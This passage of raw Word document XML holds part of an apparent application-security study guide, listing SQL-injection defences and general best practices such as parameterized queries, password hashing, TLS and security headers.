        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Escape User Inputs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D18B6"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Escape special characters in user inputs to ensure they are treated as data, not executable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1129C6A7"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Use functions or libraries that escape special characters based on the database being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB6A18E" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Limit Database Privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B60707F"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Use database accounts with the minimum privileges required for the application to function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC87C8B"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Avoid using administrative accounts for application queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EDA7A" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regular Security Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F06F6F"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Perform regular security assessments and penetration testing to identify and address SQL injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EFCB91"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Use tools like SQLMap or OWASP ZAP to test for SQL injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28615624" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39325C19"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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Avoid exposing detailed database error messages to users, as they can provide clues for attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C040DB0" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="544"/>
        </w:num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Use generic error messages and log detailed errors internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054BCB99" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78135A50" w14:textId="42439D5F" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc178383341"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are some best practices that must be implemented to secure the application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="143546E4" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ecuring an application involves implementing a variety of best practices across different areas of the development lifecycle. Here’s a comprehensive list of best practices to help secure an application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED4DBA"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1. Secure Coding Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCBBB8D" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Input Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Validate and sanitize all user inputs to ensure they conform to expected formats. Use whitelisting instead of blacklisting whenever possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6E80B" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Output Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Encode output to prevent injection attacks (e.g., HTML encoding, URL encoding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B609CFA" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Parameterized Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use parameterized queries or prepared statements to prevent SQL injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5472F863" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Safe Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Avoid using functions that concatenate user inputs directly into queries or commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AFD870"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2. Authentication and Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F1ECC" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Strong Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement strong authentication mechanisms, such as multi-factor authentication (MFA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D5758" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure Password Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use secure hashing algorithms (e.g., bcrypt, Argon2) to hash and store passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC9FA4" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Role-Based Access Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement role-based access control (RBAC) to ensure users have only the permissions they need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027513CC" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Session Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use secure methods to manage sessions (e.g., secure cookies, expiration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60853BF2"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3. Secure Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72598DA7" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure all data transmitted between clients and servers is encrypted using HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C2F3C" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TLS/SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement TLS/SSL for data in transit to prevent eavesdropping and tampering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CCFC78" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure API Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use API keys, OAuth tokens, or other authentication methods to secure API communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFE622E"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4. Data Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46096FB4" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Encrypt sensitive data both at rest and in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F22EE" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Access Controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement strict access controls for data storage and processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BBFCCC" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regular Backups</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Perform regular backups of critical data and ensure backups are encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DDED29"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5. Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E00993" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement a CSP header to prevent various types of attacks, such as XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDC1169" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Prevent clickjacking attacks by using the X-Frame-Options header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94CE27" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-Content-Type-Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Prevent MIME type sniffing by using the X-Content-Type-Options header.</w:t>
      </w:r>
    </w:p>
